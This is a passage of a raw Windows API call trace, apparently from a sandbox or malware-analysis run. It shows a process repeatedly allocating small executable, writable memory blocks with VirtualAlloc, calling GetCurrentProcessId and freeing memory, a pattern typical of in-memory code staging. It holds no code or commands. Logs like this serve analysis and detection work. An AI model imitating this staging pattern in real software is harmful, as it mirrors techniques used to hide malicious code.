GetCurrentProcessId () returned 0xfb0 [0241.274] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2c40000 [0241.275] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x1000, flProtect=0x40) returned 0x2c50000 [0241.275] VirtualAlloc (lpAddress=0x0, dwSize=0xb1, flAllocationType=0x1000, flProtect=0x40) returned 0x2c60000 [0241.275] VirtualAlloc (lpAddress=0x0, dwSize=0x1bc, flAllocationType=0x1000, flProtect=0x40) returned 0x2c70000 [0241.276] VirtualAlloc (lpAddress=0x0, dwSize=0x2c1, flAllocationType=0x1000, flProtect=0x40) returned 0x2c80000 [0241.276] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x2c90000 [0241.276] VirtualAlloc (lpAddress=0x0, dwSize=0xdd, flAllocationType=0x1000, flProtect=0x40) returned 0x2ca0000 [0241.276] VirtualAlloc (lpAddress=0x0, dwSize=0x84, flAllocationType=0x1000, flProtect=0x40) returned 0x2cb0000 [0241.277] VirtualAlloc (lpAddress=0x0, dwSize=0x95, flAllocationType=0x1000, flProtect=0x40) returned 0x2cc0000 [0241.277] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x2cd0000 [0241.277] VirtualAlloc (lpAddress=0x0, dwSize=0xc3, flAllocationType=0x1000, flProtect=0x40) returned 0x2ce0000 [0241.278] VirtualAlloc (lpAddress=0x2468000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2468000 [0241.278] GetCurrentProcessId () returned 0xfb0 [0241.278] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2cf0000 [0241.279] VirtualAlloc (lpAddress=0x0, dwSize=0xc7, flAllocationType=0x1000, flProtect=0x40) returned 0x2d00000 [0241.279] VirtualAlloc (lpAddress=0x0, dwSize=0xb6, flAllocationType=0x1000, flProtect=0x40) returned 0x2d10000 [0241.279] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x1000, flProtect=0x40) returned 0x2d20000 [0241.280] VirtualAlloc (lpAddress=0x0, dwSize=0xad, flAllocationType=0x1000, flProtect=0x40) returned 0x2d30000 [0241.280] VirtualAlloc (lpAddress=0x0, dwSize=0x272, flAllocationType=0x1000, flProtect=0x40) returned 0x2d40000 [0241.280] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x2d50000 [0241.281] VirtualAlloc (lpAddress=0x0, dwSize=0x8f, flAllocationType=0x1000, flProtect=0x40) returned 0x2d60000 [0241.281] VirtualAlloc (lpAddress=0x0, dwSize=0xca, flAllocationType=0x1000, flProtect=0x40) returned 0x2d70000 [0241.282] VirtualAlloc (lpAddress=0x0, dwSize=0xe3, flAllocationType=0x1000, flProtect=0x40) returned 0x2d80000 [0241.282] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x2d90000 [0241.283] GetCurrentProcessId () returned 0xfb0 [0241.283] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2da0000 [0241.283] VirtualAlloc (lpAddress=0x0, dwSize=0xb3, flAllocationType=0x1000, flProtect=0x40) returned 0x2db0000 [0241.283] VirtualAlloc (lpAddress=0x0, dwSize=0xe1, flAllocationType=0x1000, flProtect=0x40) returned 0x2dc0000 [0241.284] VirtualAlloc (lpAddress=0x0, dwSize=0x7b, flAllocationType=0x1000, flProtect=0x40) returned 0x2dd0000 [0241.284] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x1000, flProtect=0x40) returned 0x2de0000 [0241.285] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x2df0000 [0241.285] VirtualAlloc (lpAddress=0x0, dwSize=0x399, flAllocationType=0x1000, flProtect=0x40) returned 0x2e00000 [0241.285] VirtualAlloc (lpAddress=0x0, dwSize=0xa9, flAllocationType=0x1000, flProtect=0x40) returned 0x2e10000 [0241.286] VirtualAlloc (lpAddress=0x0, dwSize=0xb6, flAllocationType=0x1000, flProtect=0x40) returned 0x2e20000 [0241.286] VirtualAlloc (lpAddress=0x0, dwSize=0x133, flAllocationType=0x1000, flProtect=0x40) returned 0x2e30000 [0241.286] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x2e40000 [0241.287] GetCurrentProcessId () returned 0xfb0 [0241.287] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2e50000 [0241.287] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x2e60000 [0241.288] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x1000, flProtect=0x40) returned 0x2e70000 [0241.288] VirtualAlloc (lpAddress=0x0, dwSize=0x86, flAllocationType=0x1000, flProtect=0x40) returned 0x2e80000 [0241.288] VirtualAlloc (lpAddress=0x0, dwSize=0x99, flAllocationType=0x1000, flProtect=0x40) returned 0x2e90000 [0241.289] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0x2ea0000 [0241.289] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x1000, flProtect=0x40) returned 0x2eb0000 [0241.289] VirtualAlloc (lpAddress=0x0, dwSize=0xd1, flAllocationType=0x1000, flProtect=0x40) returned 0x2ec0000 [0241.290] VirtualAlloc (lpAddress=0x0, dwSize=0x87, flAllocationType=0x1000, flProtect=0x40) returned 0x2ed0000 [0241.290] VirtualAlloc (lpAddress=0x0, dwSize=0x1af, flAllocationType=0x1000, flProtect=0x40) returned 0x2ee0000 [0241.291] VirtualAlloc (lpAddress=0x0, dwSize=0x9d, flAllocationType=0x1000, flProtect=0x40) returned 0x2ef0000 [0241.291] GetCurrentProcessId () returned 0xfb0 [0241.291] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2f00000 [0241.291] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x1000, flProtect=0x40) returned 0x2f10000 [0241.292] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0x2f20000 [0241.292] VirtualAlloc (lpAddress=0x0, dwSize=0x65, flAllocationType=0x1000, flProtect=0x40) returned 0x2f30000 [0241.293] VirtualAlloc (lpAddress=0x0, dwSize=0x3a6, flAllocationType=0x1000, flProtect=0x40) returned 0x2f40000 [0241.293] VirtualAlloc (lpAddress=0x0, dwSize=0x139, flAllocationType=0x1000, flProtect=0x40) returned 0x2f50000 [0241.293] VirtualAlloc (lpAddress=0x0, dwSize=0x388, flAllocationType=0x1000, flProtect=0x40) returned 0x2f60000 [0241.294] VirtualAlloc (lpAddress=0x0, dwSize=0xfc, flAllocationType=0x1000, flProtect=0x40) returned 0x2f70000 [0241.294] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0x2f80000 [0241.295] VirtualAlloc (lpAddress=0x0, dwSize=0xcb, flAllocationType=0x1000, flProtect=0x40) returned 0x2f90000 [0241.295] VirtualAlloc (lpAddress=0x0, dwSize=0xa1, flAllocationType=0x1000, flProtect=0x40) returned 0x2fa0000 [0241.296] VirtualAlloc (lpAddress=0x246c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x246c000 [0241.296] GetCurrentProcessId () returned 0xfb0 [0241.296] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2fb0000 [0241.302] VirtualAlloc (lpAddress=0x0, dwSize=0xc5, flAllocationType=0x1000, flProtect=0x40) returned 0x2fc0000 [0241.303] VirtualAlloc (lpAddress=0x0, dwSize=0xa7, flAllocationType=0x1000, flProtect=0x40) returned 0x2fd0000 [0241.303] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x2fe0000 [0241.304] VirtualAlloc (lpAddress=0x0, dwSize=0x281, flAllocationType=0x1000, flProtect=0x40) returned 0x2ff0000 [0241.304] VirtualAlloc (lpAddress=0x0, dwSize=0x8e, flAllocationType=0x1000, flProtect=0x40) returned 0x3000000 [0241.305] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x3010000 [0241.305] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x3020000 [0241.305] VirtualAlloc (lpAddress=0x0, dwSize=0xbe, flAllocationType=0x1000, flProtect=0x40) returned 0x3030000 [0241.306] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x3040000 [0241.306] VirtualAlloc (lpAddress=0x0, dwSize=0x323, flAllocationType=0x1000, flProtect=0x40) returned 0x3050000 [0241.307] GetCurrentProcessId () returned 0xfb0 [0241.307] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3060000 [0241.307] VirtualAlloc (lpAddress=0x0, dwSize=0x9d, flAllocationType=0x1000, flProtect=0x40) returned 0x3070000 [0241.308] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x3080000 [0241.308] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x3090000 [0241.309] VirtualAlloc (lpAddress=0x0, dwSize=0x97, flAllocationType=0x1000, flProtect=0x40) returned 0x30a0000 [0241.309] VirtualAlloc (lpAddress=0x0, dwSize=0x42b, flAllocationType=0x1000, flProtect=0x40) returned 0x30b0000 [0241.310] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0x30c0000 [0241.310] VirtualAlloc (lpAddress=0x0, dwSize=0x20b, flAllocationType=0x1000, flProtect=0x40) returned 0x30d0000 [0241.310] VirtualAlloc (lpAddress=0x0, dwSize=0x8f, flAllocationType=0x1000, flProtect=0x40) returned 0x30e0000 [0241.311] VirtualAlloc (lpAddress=0x0, dwSize=0x99, flAllocationType=0x1000, flProtect=0x40) returned 0x30f0000 [0241.311] VirtualAlloc (lpAddress=0x0, dwSize=0xab, flAllocationType=0x1000, flProtect=0x40) returned 0x3100000 [0241.312] GetCurrentProcessId () returned 0xfb0 [0241.312] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3110000 [0241.312] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x1000, flProtect=0x40) returned 0x3120000 [0241.313] VirtualAlloc (lpAddress=0x0, dwSize=0x65f, flAllocationType=0x1000, flProtect=0x40) returned 0x3130000 [0241.313] VirtualAlloc (lpAddress=0x0, dwSize=0xd2, flAllocationType=0x1000, flProtect=0x40) returned 0x3140000 [0241.314] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x3150000 [0241.314] VirtualAlloc (lpAddress=0x0, dwSize=0xa1, flAllocationType=0x1000, flProtect=0x40) returned 0x3160000 [0241.314] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x3170000 [0241.315] VirtualAlloc (lpAddress=0x0, dwSize=0x418, flAllocationType=0x1000, flProtect=0x40) returned 0x3180000 [0241.315] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x3190000 [0241.316] VirtualAlloc (lpAddress=0x0, dwSize=0xd8, flAllocationType=0x1000, flProtect=0x40) returned 0x31a0000 [0241.316] VirtualAlloc (lpAddress=0x0, dwSize=0x97, flAllocationType=0x1000, flProtect=0x40) returned 0x31b0000 [0241.316] VirtualAlloc (lpAddress=0x2470000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2470000 [0241.317] GetCurrentProcessId () returned 0xfb0 [0241.317] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x31c0000 [0241.317] VirtualAlloc (lpAddress=0x0, dwSize=0x26a, flAllocationType=0x1000, flProtect=0x40) returned 0x31d0000 [0241.318] VirtualAlloc (lpAddress=0x0, dwSize=0x81, flAllocationType=0x1000, flProtect=0x40) returned 0x31e0000 [0241.318] VirtualAlloc (lpAddress=0x0, dwSize=0x79, flAllocationType=0x1000, flProtect=0x40) returned 0x31f0000 [0241.318] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x3200000 [0241.319] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x3210000 [0241.319] VirtualAlloc (lpAddress=0x0, dwSize=0xb5, flAllocationType=0x1000, flProtect=0x40) returned 0x3220000 [0241.320] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x3230000 [0241.320] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x3240000 [0241.321] VirtualAlloc (lpAddress=0x0, dwSize=0x396, flAllocationType=0x1000, flProtect=0x40) returned 0x3250000 [0241.321] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x3260000 [0241.322] GetCurrentProcessId () returned 0xfb0 [0241.322] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3270000 [0241.322] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x3280000 [0241.322] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x1000, flProtect=0x40) returned 0x3290000 [0241.323] VirtualAlloc (lpAddress=0x0, dwSize=0x521, flAllocationType=0x1000, flProtect=0x40) returned 0x32a0000 [0241.323] VirtualAlloc (lpAddress=0x0, dwSize=0xcb, flAllocationType=0x1000, flProtect=0x40) returned 0x32b0000 [0241.324] VirtualAlloc (lpAddress=0x0, dwSize=0xad, flAllocationType=0x1000, flProtect=0x40) returned 0x32c0000 [0241.324] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x32d0000 [0241.324] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0x32e0000 [0241.325] VirtualAlloc (lpAddress=0x0, dwSize=0x88, flAllocationType=0x1000, flProtect=0x40) returned 0x32f0000 [0241.325] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0x3300000 [0241.326] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x1000, flProtect=0x40) returned 0x3310000 [0241.326] VirtualAlloc (lpAddress=0x2474000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2474000 [0241.327] GetCurrentProcessId () returned 0xfb0 [0241.327] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3320000 [0241.327] VirtualAlloc (lpAddress=0x0, dwSize=0x8b, flAllocationType=0x1000, flProtect=0x40) returned 0x3330000 [0241.327] VirtualAlloc (lpAddress=0x0, dwSize=0x99, flAllocationType=0x1000, flProtect=0x40) returned 0x3340000 [0241.328] VirtualAlloc (lpAddress=0x0, dwSize=0xb6, flAllocationType=0x1000, flProtect=0x40) returned 0x3350000 [0241.328] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0x3360000 [0241.329] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x3370000 [0241.329] VirtualAlloc (lpAddress=0x0, dwSize=0x86, flAllocationType=0x1000, flProtect=0x40) returned 0x3380000 [0241.330] VirtualAlloc (lpAddress=0x0, dwSize=0x91, flAllocationType=0x1000, flProtect=0x40) returned 0x3390000 [0241.330] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x1000, flProtect=0x40) returned 0x33a0000 [0241.331] VirtualAlloc (lpAddress=0x0, dwSize=0x371, flAllocationType=0x1000, flProtect=0x40) returned 0x33b0000 [0241.331] VirtualAlloc (lpAddress=0x0, dwSize=0x7f, flAllocationType=0x1000, flProtect=0x40) returned 0x33c0000 [0241.332] GetCurrentProcessId () returned 0xfb0 [0241.332] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x33d0000 [0241.332] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x33e0000 [0241.333] VirtualAlloc (lpAddress=0x0, dwSize=0xa1, flAllocationType=0x1000, flProtect=0x40) returned 0x33f0000 [0241.333] VirtualAlloc (lpAddress=0x0, dwSize=0x327, flAllocationType=0x1000, flProtect=0x40) returned 0x3400000 [0241.334] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x3410000 [0241.334] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x1000, flProtect=0x40) returned 0x3420000 [0241.334] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x1000, flProtect=0x40) returned 0x3430000 [0241.335] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x3440000 [0241.335] VirtualAlloc (lpAddress=0x0, dwSize=0xc1, flAllocationType=0x1000, flProtect=0x40) returned 0x3450000 [0241.336] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x1000, flProtect=0x40) returned 0x3460000 [0241.336] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x3470000 [0241.337] GetCurrentProcessId () returned 0xfb0 [0241.337] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3480000 [0241.338] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0x3490000 [0241.338] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x34a0000 [0241.339] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x34b0000 [0241.340] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x34c0000 [0241.340] VirtualAlloc (lpAddress=0x0, dwSize=0xb5, flAllocationType=0x1000, flProtect=0x40) returned 0x34d0000 [0241.341] VirtualAlloc (lpAddress=0x0, dwSize=0xd1, flAllocationType=0x1000, flProtect=0x40) returned 0x34e0000 [0241.342] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x34f0000 [0241.342] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x3500000 [0241.343] VirtualAlloc (lpAddress=0x0, dwSize=0xb3, flAllocationType=0x1000, flProtect=0x40) returned 0x3510000 [0241.379] VirtualAlloc (lpAddress=0x0, dwSize=0x1f3, flAllocationType=0x1000, flProtect=0x40) returned 0x3520000 [0241.380] GetCurrentProcessId () returned 0xfb0 [0241.380] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3530000 [0241.380] VirtualAlloc (lpAddress=0x0, dwSize=0x18a, flAllocationType=0x1000, flProtect=0x40) returned 0x3540000 [0241.381] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x3550000 [0241.382] VirtualAlloc (lpAddress=0x0, dwSize=0xa9, flAllocationType=0x1000, flProtect=0x40) returned 0x3560000 [0241.382] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x1000, flProtect=0x40) returned 0x3570000 [0241.383] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x3580000 [0241.401] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.402] GetCurrentProcessId () returned 0xfb0 [0241.403] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.403] GetCurrentProcessId () returned 0xfb0 [0241.403] GetCurrentProcessId () returned 0xfb0 [0241.403] GetCurrentProcessId () returned 0xfb0 [0241.403] GetCurrentProcessId () returned 0xfb0 [0241.403] GetCurrentProcessId () returned 0xfb0 [0241.403] GetCurrentProcessId () returned 0xfb0 [0241.403] GetCurrentProcessId () returned 0xfb0 [0241.403] GetCurrentProcessId () returned 0xfb0 [0241.403] GetCurrentProcessId () returned 0xfb0 [0241.404] GetCurrentProcessId () returned 0xfb0 [0241.404] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.404] GetCurrentProcessId () returned 0xfb0 [0241.404] GetCurrentProcessId () returned 0xfb0 [0241.404] GetCurrentProcessId () returned 0xfb0 [0241.404] GetCurrentProcessId () returned 0xfb0 [0241.404] GetCurrentProcessId () returned 0xfb0 [0241.404] GetCurrentProcessId () returned 0xfb0 [0241.404] GetCurrentProcessId () returned 0xfb0 [0241.404] GetCurrentProcessId () returned 0xfb0 [0241.404] GetCurrentProcessId () returned 0xfb0 [0241.404] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.405] GetCurrentProcessId () returned 0xfb0 [0241.406] GetCurrentProcessId () returned 0xfb0 [0241.406] GetCurrentProcessId () returned 0xfb0 [0241.406] GetCurrentProcessId () returned 0xfb0 [0241.414] GetCurrentProcessId () returned 0xfb0 [0241.414] GetCurrentProcessId () returned 0xfb0 [0241.414] GetCurrentProcessId () returned 0xfb0 [0241.414] GetCurrentProcessId () returned 0xfb0 [0241.414] GetCurrentProcessId () returned 0xfb0 [0241.414] GetCurrentProcessId () returned 0xfb0 [0241.414] GetCurrentProcessId () returned 0xfb0 [0241.414] GetCurrentProcessId () returned 0xfb0 [0241.414] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.415] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.416] GetCurrentProcessId () returned 0xfb0 [0241.417] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.417] GetCurrentProcessId () returned 0xfb0 [0241.417] GetCurrentProcessId () returned 0xfb0 [0241.417] GetCurrentProcessId () returned 0xfb0 [0241.417] GetCurrentProcessId () returned 0xfb0 [0241.417] GetCurrentProcessId () returned 0xfb0 [0241.417] GetCurrentProcessId () returned 0xfb0 [0241.417] GetCurrentProcessId () returned 0xfb0 [0241.417] GetCurrentProcessId () returned 0xfb0 [0241.417] GetCurrentProcessId () returned 0xfb0 [0241.418] GetCurrentProcessId () returned 0xfb0 [0241.418] GetCurrentProcessId () returned 0xfb0 [0241.418] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 [0241.419] GetCurrentProcessId () returned 0xfb0 